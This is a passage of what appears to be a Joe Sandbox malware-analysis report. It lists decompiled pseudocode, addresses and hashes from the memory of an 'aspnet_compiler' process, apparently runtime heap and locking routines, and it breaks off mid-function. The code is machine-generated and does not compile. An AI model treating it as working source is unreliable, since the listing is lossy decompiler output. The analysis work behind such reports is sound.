                          • Instruction ID: 9b4382f418b08edb2148f718081afb9bf73285d457b7bd3f4cf51b20105ff948
                          • Opcode Fuzzy Hash: 0a291524e9b21f76d22cfc6f8e1a0b46badb7ab2a05df3e0ef0450ce2d9f68ba
                          • Instruction Fuzzy Hash: 47315C716057118FE360CF1DC840B27BBE8EB98B18F55496EE99897361E7B0EC44CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E013FAA16(signed short* __ecx) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				signed short _v16;
                          				intOrPtr _v20;
                          				signed short _v24;
                          				signed short _v28;
                          				void* _v32;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t25;
                          				signed short _t38;
                          				signed short* _t42;
                          				signed int _t44;
                          				signed short* _t52;
                          				signed short _t53;
                          				signed int _t54;
                          
                          				_v8 =  *0x14ed360 ^ _t54;
                          				_t42 = __ecx;
                          				_t44 =  *__ecx & 0x0000ffff;
                          				_t52 =  &(__ecx[2]);
                          				_t51 = _t44 + 2;
                          				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                          					L4:
                          					_t25 =  *0x14e7b9c; // 0x0
                          					_t53 = L01414620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                          					__eflags = _t53;
                          					if(_t53 == 0) {
                          						L3:
                          						return E0143B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                          					} else {
                          						E0143F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                          						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                          						L2:
                          						_t51 = 4;
                          						if(L01406C59(_t53, _t51, _t58) != 0) {
                          							_t28 = E01425E50(0x13dc338, 0, 0,  &_v32);
                          							__eflags = _t28;
                          							if(_t28 == 0) {
                          								_t38 = ( *_t42 & 0x0000ffff) + 2;
                          								__eflags = _t38;
                          								_v24 = _t53;
                          								_v16 = _t38;
                          								_v20 = 0;
                          								_v12 = 0;
                          								E0142B230(_v32, _v28, 0x13dc2d8, 1,  &_v24);
                          								_t28 = E013FF7A0(_v32, _v28);
                          							}
                          							__eflags = _t53 -  *_t52;
                          							if(_t53 !=  *_t52) {
                          								_t28 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                          							}
                          						}
                          						goto L3;
                          					}
                          				}
                          				_t53 =  *_t52;
                          				_t44 = _t44 >> 1;
                          				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                          				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                          					goto L4;
                          				}
                          				goto L2;
                          			}




















                          0x013faa25
                          0x013faa29
                          0x013faa2d
                          0x013faa30
                          0x013faa37
                          0x013faa3c
                          0x01454458
                          0x01454458
                          0x01454472
                          0x01454474
                          0x01454476
                          0x013faa64
                          0x013faa74
                          0x0145447c
                          0x01454483
                          0x01454492
                          0x013faa52
                          0x013faa54
                          0x013faa5e
                          0x014544a8
                          0x014544ad
                          0x014544af
                          0x014544b6
                          0x014544b6
                          0x014544b9
                          0x014544bc
                          0x014544cd
                          0x014544d3
                          0x014544d6
                          0x014544e1
                          0x014544e1
                          0x014544e6
                          0x014544e8
                          0x014544fb
                          0x014544fb
                          0x014544e8
                          0x00000000
                          0x013faa5e
                          0x01454476
                          0x013faa42
                          0x013faa46
                          0x013faa48
                          0x013faa4c
                          0x00000000
                          0x00000000
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac4cd60a833c967fadeb2d7891b08b399f17531744b943d57c8dfadafa04384e
                          • Instruction ID: db87bbd4c12852c62254985baf33dabc9b3f4c29aaea4e6223f32e8e4be02e87
                          • Opcode Fuzzy Hash: ac4cd60a833c967fadeb2d7891b08b399f17531744b943d57c8dfadafa04384e
                          • Instruction Fuzzy Hash: E2310372A0021AABDF11DFA9CD41ABFB7B8EF14700F04406EF905EB261E7349954CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E01434A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				signed int* _v12;
                          				char _v13;
                          				signed int _v16;
                          				char _v21;
                          				signed int* _v24;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t29;
                          				signed int* _t32;
                          				signed int* _t41;
                          				signed int _t42;
                          				void* _t43;
                          				intOrPtr* _t51;
                          				void* _t52;
                          				signed int _t53;
                          				signed int _t58;
                          				void* _t59;
                          				signed int _t60;
                          				signed int _t62;
                          
                          				_t49 = __edx;
                          				_t62 = (_t60 & 0xfffffff8) - 0xc;
                          				_t26 =  *0x14ed360 ^ _t62;
                          				_v8 =  *0x14ed360 ^ _t62;
                          				_t41 = __ecx;
                          				_t51 = __edx;
                          				_v12 = __ecx;
                          				if(_a4 == 0) {
                          					if(_a8 != 0) {
                          						goto L1;
                          					}
                          					_v13 = 1;
                          					E01412280(_t26, 0x14e8608);
                          					_t58 =  *_t41;
                          					if(_t58 == 0) {
                          						L11:
                          						E0140FFB0(_t41, _t51, 0x14e8608);
                          						L2:
                          						 *0x14eb1e0(_a4, _a8);
                          						_t42 =  *_t51();
                          						if(_t42 == 0) {
                          							_t29 = 0;
                          							L5:
                          							_pop(_t52);
                          							_pop(_t59);
                          							_pop(_t43);
                          							return E0143B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                          						}
                          						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                          						if(_v21 != 0) {
                          							_t53 = 0;
                          							E01412280(_t28, 0x14e8608);
                          							_t32 = _v24;
                          							if( *_t32 == _t58) {
                          								 *_t32 = _t42;
                          								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                          								if(_t58 != 0) {
                          									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                          									asm("sbb edi, edi");
                          									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                          								}
                          							}
                          							E0140FFB0(_t42, _t53, 0x14e8608);
                          							if(_t53 != 0) {
                          								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                          							}
                          						}
                          						_t29 = _t42;
                          						goto L5;
                          					}
                          					if( *((char*)(_t58 + 0x40)) != 0) {
                          						L10:
                          						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                          						E0140FFB0(_t41, _t51, 0x14e8608);
                          						_t29 = _t58;
                          						goto L5;
                          					}
                          					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                          					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                          						goto L11;
                          					}
                          					goto L10;
                          				}
                          				L1:
                          				_v13 = 0;
                          				_t58 = 0;
                          				goto L2;
                          			}
























                          0x01434a2c
                          0x01434a34
                          0x01434a3c
                          0x01434a3e
                          0x01434a48
                          0x01434a4b
                          0x01434a4d
                          0x01434a51
                          0x01434a9c
                          0x00000000
                          0x00000000
                          0x01434aa3
                          0x01434aa8
                          0x01434aad
                          0x01434ab1
                          0x01434ade
                          0x01434ae3
                          0x01434a5a
                          0x01434a62
                          0x01434a6a
                          0x01434a6e
                          0x0146f203
                          0x01434a84
                          0x01434a88
                          0x01434a89
                          0x01434a8a
                          0x01434a95
                          0x01434a95
                          0x01434a79
                          0x01434a80
                          0x01434af2
                          0x01434af4
                          0x01434af9
                          0x01434aff
                          0x01434b01
                          0x01434b03
                          0x01434b08
                          0x0146f20a
                          0x0146f212
                          0x0146f216
                          0x0146f216
                          0x01434b08
                          0x01434b13
                          0x01434b1a
                          0x0146f229
                          0x0146f229
                          0x01434b1a
                          0x01434a82
                          0x00000000
                          0x01434a82
                          0x01434ab7
                          0x01434acd
                          0x01434acd
                          0x01434ad5
                          0x01434ada
                          0x00000000
                          0x01434ada
                          0x01434ac2
                          0x01434acb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01434acb
                          0x01434a53
                          0x01434a53
                          0x01434a58
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7aca8750c56209a788a626a6ad1a4a88c84f322f0564b3549d6f62b41c513842
                          • Instruction ID: 399cd1a906db26b260efb2f82a9144faf00f9cc190942cbcb7f3b41c6e9ffae4
                          • Opcode Fuzzy Hash: 7aca8750c56209a788a626a6ad1a4a88c84f322f0564b3549d6f62b41c513842
                          • Instruction Fuzzy Hash: E131F5322012119BC732EF69C944B6BBBE4FBD9610F18042FE85547271CBB0D806CB85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E01438EC7(void* __ecx, void* __edx) {
                          				signed int _v8;
                          				signed int* _v16;
                          				intOrPtr _v20;
                          				signed int* _v24;
                          				char* _v28;
                          				signed int* _v32;
                          				intOrPtr _v36;
                          				signed int* _v40;
                          				signed int* _v44;
                          				signed int* _v48;
                          				intOrPtr _v52;
                          				signed int* _v56;
                          				signed int* _v60;
                          				signed int* _v64;
                          				intOrPtr _v68;
                          				signed int* _v72;
                          				char* _v76;
                          				signed int* _v80;
                          				signed int _v84;
                          				signed int* _v88;
                          				intOrPtr _v92;
                          				signed int* _v96;
                          				intOrPtr _v100;
                          				signed int* _v104;
                          				signed int* _v108;
                          				char _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int* _v152;
                          				char _v156;
                          				signed int* _v160;
                          				char _v164;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t67;
                          				intOrPtr _t70;
                          				void* _t71;
                          				void* _t72;
                          				signed int _t73;
                          
                          				_t69 = __edx;
                          				_v8 =  *0x14ed360 ^ _t73;
                          				_t48 =  *[fs:0x30];
                          				_t72 = __edx;
                          				_t71 = __ecx;
                          				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                          					_t48 = E01424E70(0x14e86e4, 0x1439490, 0, 0);
                          					if( *0x14e53e8 > 5 && E01438F33(0x14e53e8, 0, 0x2000) != 0) {
                          						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                          						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                          						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                          						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                          						_v108 =  &_v84;
                          						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                          						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                          						_v76 =  &_v156;
                          						_t70 = 8;
                          						_v60 =  &_v144;
                          						_t67 = 4;
                          						_v44 =  &_v148;
                          						_v152 = 0;
                          						_v160 = 0;
                          						_v104 = 0;
                          						_v100 = 2;
                          						_v96 = 0;
                          						_v88 = 0;
                          						_v80 = 0;
                          						_v72 = 0;
                          						_v68 = _t70;
                          						_v64 = 0;
                          						_v56 = 0;
                          						_v52 = 0x14e53e8;
                          						_v48 = 0;
                          						_v40 = 0;
                          						_v36 = 0x14e53e8;
                          						_v32 = 0;
                          						_v28 =  &_v164;
                          						_v24 = 0;
                          						_v20 = _t70;
                          						_v16 = 0;
                          						_t69 = 0x13dbc46;
                          						_t48 = E01477B9C(0x14e53e8, 0x13dbc46, _t67, 0x14e53e8, _t70,  &_v140);
                          					}
                          				}
                          				return E0143B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                          			}











































                          0x01438ec7
                          0x01438ed9
                          0x01438edc
                          0x01438ee6
                          0x01438ee9
                          0x01438eee
                          0x01438efc
                          0x01438f08
                          0x01471349
                          0x01471353
                          0x0147135d
                          0x01471366
                          0x0147136f
                          0x01471375
                          0x0147137c
                          0x01471385
                          0x01471390
                          0x01471391
                          0x0147139c
                          0x0147139d
                          0x014713a6
                          0x014713ac
                          0x014713b2
                          0x014713b5
                          0x014713bc
                          0x014713bf
                          0x014713c2
                          0x014713c5
                          0x014713c8
                          0x014713cb
                          0x014713ce
                          0x014713d1
                          0x014713d4
                          0x014713d7
                          0x014713da
                          0x014713dd
                          0x014713e0
                          0x014713e3
                          0x014713e6
                          0x014713e9
                          0x014713f6
                          0x01471400
                          0x01471400
                          0x01438f08
                          0x01438f32

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bec720a3cfa0d94e87acedf689f83ec59461b528cf88117d2cafde84550119f4
                          • Instruction ID: db3d710ddff657b539143d777ec3cfb201972d6dc923febd9ea7ec2a2b546dc6
                          • Opcode Fuzzy Hash: bec720a3cfa0d94e87acedf689f83ec59461b528cf88117d2cafde84550119f4
                          • Instruction Fuzzy Hash: FF41A1B5D003199EDB20CFAAD980AAEFBF4FB48710F5041AFE509A7611DB705A84CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E0142E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                          				intOrPtr* _v0;
                          				signed char _v4;
                          				signed int _v8;
                          				void* __ecx;
                          				void* __ebp;
                          				void* _t37;
                          				intOrPtr _t38;
                          				signed int _t44;
                          				signed char _t52;
                          				void* _t54;
                          				intOrPtr* _t56;
                          				void* _t58;
                          				char* _t59;
                          				signed int _t62;
                          
                          				_t58 = __edx;
                          				_push(0);
                          				_push(4);
                          				_push( &_v8);
                          				_push(0x24);
                          				_push(0xffffffff);
                          				if(E01439670() < 0) {
                          					L0144DF30(_t54, _t58, _t35);
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					_push(_t54);
                          					_t52 = _v4;
                          					if(_t52 > 8) {
                          						_t37 = 0xc0000078;
                          					} else {
                          						_t38 =  *0x14e7b9c; // 0x0
                          						_t62 = _t52 & 0x000000ff;
                          						_t59 = L01414620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                          						if(_t59 == 0) {
                          							_t37 = 0xc0000017;
                          						} else {
                          							_t56 = _v0;
                          							 *(_t59 + 1) = _t52;
                          							 *_t59 = 1;
                          							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                          							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                          							_t44 = _t62 - 1;
                          							if(_t44 <= 7) {
                          								switch( *((intOrPtr*)(_t44 * 4 +  &M0142E810))) {
                          									case 0:
                          										L6:
                          										 *((intOrPtr*)(_t59 + 8)) = _a8;
                          										goto L7;
                          									case 1:
                          										L13:
                          										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                          										goto L6;
                          									case 2:
                          										L12:
                          										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                          										goto L13;
                          									case 3:
                          										L11:
                          										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                          										goto L12;
                          									case 4:
                          										L10:
                          										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                          										goto L11;
                          									case 5:
                          										L9:
                          										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                          										goto L10;
                          									case 6:
                          										L17:
                          										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                          										goto L9;
                          									case 7:
                          										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                          										goto L17;
                          								}
                          							}
                          							L7:
                          							 *_a40 = _t59;
                          							_t37 = 0;
                          						}
                          					}
                          					return _t37;
                          				} else {
                          					_push(0x20);
                          					asm("ror eax, cl");
                          					return _a4 ^ _v8;
                          				}
                          			}

















                          0x0142e730
                          0x0142e736
                          0x0142e738
                          0x0142e73d
                          0x0142e73e
                          0x0142e740
                          0x0142e749
                          0x0142e765
                          0x0142e76a
                          0x0142e76b
                          0x0142e76c
                          0x0142e76d
                          0x0142e76e
                          0x0142e76f
                          0x0142e775
                          0x0142e777
                          0x0142e77e
                          0x0146b675
                          0x0142e784
                          0x0142e784
                          0x0142e789
                          0x0142e7a8
                          0x0142e7ac
                          0x0142e807
                          0x0142e7ae
                          0x0142e7ae
                          0x0142e7b1
                          0x0142e7b4
                          0x0142e7b9
                          0x0142e7c0
                          0x0142e7c4
                          0x0142e7ca
                          0x0142e7cc
                          0x00000000
                          0x0142e7d3
                          0x0142e7d6
                          0x00000000
                          0x00000000
                          0x0142e7ff
                          0x0142e802
                          0x00000000
                          0x00000000
                          0x0142e7f9
                          0x0142e7fc
                          0x00000000
                          0x00000000
                          0x0142e7f3
                          0x0142e7f6
                          0x00000000
                          0x00000000
                          0x0142e7ed
                          0x0142e7f0
                          0x00000000
                          0x00000000
                          0x0142e7e7
                          0x0142e7ea
                          0x00000000
                          0x00000000
                          0x0146b685
                          0x0146b688
                          0x00000000
                          0x00000000
                          0x0146b682
                          0x00000000
                          0x00000000
                          0x0142e7cc
                          0x0142e7d9
                          0x0142e7dc
                          0x0142e7de
                          0x0142e7de
                          0x0142e7ac
                          0x0142e7e4
                          0x0142e74b
                          0x0142e751
                          0x0142e759
                          0x0142e761
                          0x0142e761

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff0a5b70e3e6a97bf566402c02a95f045cbd0f9d78bed3e2351cce233feeefa5
                          • Instruction ID: 047dae583c9f2056cc13cb408ce08ea4de4a8dacad154f50082944e2ba98109e
                          • Opcode Fuzzy Hash: ff0a5b70e3e6a97bf566402c02a95f045cbd0f9d78bed3e2351cce233feeefa5
                          • Instruction Fuzzy Hash: F6319C75A14249EFD704CF68C841F9ABBE8FB58314F14826AFA08DB351D671EC80CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E0142BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				void* __ebx;
                          				void* __edi;
                          				intOrPtr _t22;
                          				intOrPtr* _t41;
                          				intOrPtr _t51;
                          
                          				_t51 =  *0x14e6100; // 0x5
                          				_v12 = __edx;
                          				_v8 = __ecx;
                          				if(_t51 >= 0x800) {
                          					L12:
                          					return 0;
                          				} else {
                          					goto L1;
                          				}
                          				while(1) {
                          					L1:
                          					_t22 = _t51;
                          					asm("lock cmpxchg [ecx], edx");
                          					if(_t51 == _t22) {
                          						break;
                          					}
                          					_t51 = _t22;
                          					if(_t22 < 0x800) {
                          						continue;
                          					}
                          					goto L12;
                          				}
                          				E01412280(0xd, 0x687f1a0);
                          				_t41 =  *0x14e60f8; // 0x0
                          				if(_t41 != 0) {
                          					 *0x14e60f8 =  *_t41;
                          					 *0x14e60fc =  *0x14e60fc + 0xffff;
                          				}
                          				E0140FFB0(_t41, 0x800, 0x687f1a0);
                          				if(_t41 != 0) {
                          					L6:
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                          					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                          					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                          					do {
                          						asm("lock xadd [0x14e60f0], ax");
                          						 *((short*)(_t41 + 0x34)) = 1;
                          					} while (1 == 0);
                          					goto L8;
                          				} else {
                          					_t41 = L01414620(0x14e6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                          					if(_t41 == 0) {
                          						L11:
                          						asm("lock dec dword [0x14e6100]");
                          						L8:
                          						return _t41;
                          					}
                          					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                          					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                          					if(_t41 == 0) {
                          						goto L11;
                          					}
                          					goto L6;
                          				}
                          			}










                          0x0142bc36
                          0x0142bc42
                          0x0142bc45
                          0x0142bc4a
                          0x0142bd35
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0142bc50
                          0x0142bc50
                          0x0142bc58
                          0x0142bc5a
                          0x0142bc60
                          0x00000000
                          0x00000000
                          0x0146a4f2
                          0x0146a4f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0146a4fc
                          0x0142bc79
                          0x0142bc7e
                          0x0142bc86
                          0x0142bd16
                          0x0142bd20
                          0x0142bd20
                          0x0142bc8d
                          0x0142bc94
                          0x0142bcbd
                          0x0142bcca
                          0x0142bccb
                          0x0142bccc
                          0x0142bccd
                          0x0142bcce
                          0x0142bcd4
                          0x0142bcea
                          0x0142bcee
                          0x0142bcf2
                          0x0142bd00
                          0x0142bd04
                          0x00000000
                          0x0142bc96
                          0x0142bcab
                          0x0142bcaf
                          0x0142bd2c
                          0x0142bd2c
                          0x0142bd09
                          0x00000000
                          0x0142bd09
                          0x0142bcb1
                          0x0142bcb5
                          0x0142bcbb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0142bcbb

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2f55928cfe83554a8d52420c62b86d02a23665ddf85be8bd148f78ad9cc007b
                          • Instruction ID: 587b956c1a959f399d2302adf6b56281e2c4819cee6397324fe4344f9a6896ce
                          • Opcode Fuzzy Hash: b2f55928cfe83554a8d52420c62b86d02a23665ddf85be8bd148f78ad9cc007b
                          • Instruction Fuzzy Hash: 713131726106268BCB22DF58C4807A677B4FB28310F45407EED04DF326EB34D9868B80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E013F9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                          				signed int _t53;
                          				signed int _t56;
                          				signed int* _t60;
                          				signed int _t63;
                          				signed int _t66;
                          				signed int _t69;
                          				void* _t70;
                          				intOrPtr* _t72;
                          				void* _t78;
                          				void* _t79;
                          				signed int _t80;
                          				intOrPtr _t82;
                          				void* _t85;
                          				void* _t88;
                          				void* _t89;
                          
                          				_t84 = __esi;
                          				_t70 = __ecx;
                          				_t68 = __ebx;
                          				_push(0x2c);
                          				_push(0x14cf6e8);
                          				E0144D0E8(__ebx, __edi, __esi);
                          				 *((char*)(_t85 - 0x1d)) = 0;
                          				_t82 =  *((intOrPtr*)(_t85 + 8));
                          				if(_t82 == 0) {
                          					L4:
                          					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                          						E014C88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                          					}
                          					L5:
                          					return E0144D130(_t68, _t82, _t84);
                          				}
                          				_t88 = _t82 -  *0x14e86c0; // 0xfa07b0
                          				if(_t88 == 0) {
                          					goto L4;
                          				}
                          				_t89 = _t82 -  *0x14e86b8; // 0x0
                          				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                          					goto L4;
                          				} else {
                          					E01412280(_t82 + 0xe0, _t82 + 0xe0);
                          					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                          					__eflags =  *((char*)(_t82 + 0xe5));
                          					if(__eflags != 0) {
                          						E014C88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                          						goto L12;
                          					} else {
                          						__eflags =  *((char*)(_t82 + 0xe4));
                          						if( *((char*)(_t82 + 0xe4)) == 0) {
                          							 *((char*)(_t82 + 0xe4)) = 1;
                          							_push(_t82);
                          							_push( *((intOrPtr*)(_t82 + 0x24)));
                          							E0143AFD0();
                          						}
                          						while(1) {
                          							_t60 = _t82 + 8;
                          							 *(_t85 - 0x2c) = _t60;
                          							_t68 =  *_t60;
                          							_t80 = _t60[1];
                          							 *(_t85 - 0x28) = _t68;
                          							 *(_t85 - 0x24) = _t80;
                          							while(1) {
                          								L10:
                          								__eflags = _t80;
                          								if(_t80 == 0) {
                          									break;
                          								}
                          								_t84 = _t68;
                          								 *(_t85 - 0x30) = _t80;
                          								 *(_t85 - 0x24) = _t80 - 1;
                          								asm("lock cmpxchg8b [edi]");
                          								_t68 = _t84;
                          								 *(_t85 - 0x28) = _t68;
                          								 *(_t85 - 0x24) = _t80;
                          								__eflags = _t68 - _t84;
                          								_t82 =  *((intOrPtr*)(_t85 + 8));
                          								if(_t68 != _t84) {
                          									continue;
                          								}
                          								__eflags = _t80 -  *(_t85 - 0x30);
                          								if(_t80 !=  *(_t85 - 0x30)) {
                          									continue;
                          								}
                          								__eflags = _t80;
                          								if(_t80 == 0) {
                          									break;
                          								}
                          								_t63 = 0;
                          								 *(_t85 - 0x34) = 0;
                          								_t84 = 0;
                          								__eflags = 0;
                          								while(1) {
                          									 *(_t85 - 0x3c) = _t84;
                          									__eflags = _t84 - 3;
                          									if(_t84 >= 3) {
                          										break;
                          									}
                          									__eflags = _t63;
                          									if(_t63 != 0) {
                          										L40:
                          										_t84 =  *_t63;
                          										__eflags = _t84;
                          										if(_t84 != 0) {
                          											_t84 =  *(_t84 + 4);
                          											__eflags = _t84;
                          											if(_t84 != 0) {
                          												 *0x14eb1e0(_t63, _t82);
                          												 *_t84();
                          											}
                          										}
                          										do {
                          											_t60 = _t82 + 8;
                          											 *(_t85 - 0x2c) = _t60;
                          											_t68 =  *_t60;
                          											_t80 = _t60[1];
                          											 *(_t85 - 0x28) = _t68;
                          											 *(_t85 - 0x24) = _t80;
                          											goto L10;
                          										} while (_t63 == 0);
                          										goto L40;
                          									}
                          									_t69 = 0;
                          									__eflags = 0;
                          									while(1) {
                          										 *(_t85 - 0x38) = _t69;
                          										__eflags = _t69 -  *0x14e84c0;
                          										if(_t69 >=  *0x14e84c0) {
                          											break;
                          										}
                          										__eflags = _t63;
                          										if(_t63 != 0) {
                          											break;
                          										}
                          										_t66 = E014C9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                          										__eflags = _t66;
                          										if(_t66 == 0) {
                          											_t63 = 0;
                          											__eflags = 0;
                          										} else {
                          											_t63 = _t66 + 0xfffffff4;
                          										}
                          										 *(_t85 - 0x34) = _t63;
                          										_t69 = _t69 + 1;
                          									}
                          									_t84 = _t84 + 1;
                          								}
                          								__eflags = _t63;
                          							}
                          							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                          							 *((char*)(_t82 + 0xe5)) = 1;
                          							 *((char*)(_t85 - 0x1d)) = 1;
                          							L12:
                          							 *(_t85 - 4) = 0xfffffffe;
                          							E013F922A(_t82);
                          							_t53 = E01417D50();
                          							__eflags = _t53;
                          							if(_t53 != 0) {
                          								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          							} else {
                          								_t56 = 0x7ffe0386;
                          							}
                          							__eflags =  *_t56;
                          							if( *_t56 != 0) {
                          								_t56 = E014C8B58(_t82);
                          							}
                          							__eflags =  *((char*)(_t85 - 0x1d));
                          							if( *((char*)(_t85 - 0x1d)) != 0) {
                          								__eflags = _t82 -  *0x14e86c0; // 0xfa07b0
                          								if(__eflags != 0) {
                          									__eflags = _t82 -  *0x14e86b8; // 0x0
                          									if(__eflags == 0) {
                          										_t79 = 0x14e86bc;
                          										_t72 = 0x14e86b8;
                          										goto L18;
                          									}
                          									__eflags = _t56 | 0xffffffff;
                          									asm("lock xadd [edi], eax");
                          									if(__eflags == 0) {
                          										E013F9240(_t68, _t82, _t82, _t84, __eflags);
                          									}
                          								} else {
                          									_t79 = 0x14e86c4;
                          									_t72 = 0x14e86c0;
                          									L18:
                          									E01429B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                          								}
                          							}
                          							goto L5;
                          						}
                          					}
                          				}
                          			}


















                          0x013f9100
                          0x013f9100
                          0x013f9100
                          0x013f9100
                          0x013f9102
                          0x013f9107
                          0x013f910c
                          0x013f9110
                          0x013f9115
                          0x013f9136
                          0x013f9143
                          0x014537e4
                          0x014537e4
                          0x013f9149
                          0x013f914e
                          0x013f914e
                          0x013f9117
                          0x013f911d
                          0x00000000
                          0x00000000
                          0x013f911f
                          0x013f9125
                          0x00000000
                          0x013f9151
                          0x013f9158
                          0x013f915d
                          0x013f9161
                          0x013f9168
                          0x01453715
                          0x00000000
                          0x013f916e
                          0x013f916e
                          0x013f9175
                          0x013f9177
                          0x013f917e
                          0x013f917f
                          0x013f9182
                          0x013f9182
                          0x013f9187
                          0x013f9187
                          0x013f918a
                          0x013f918d
                          0x013f918f
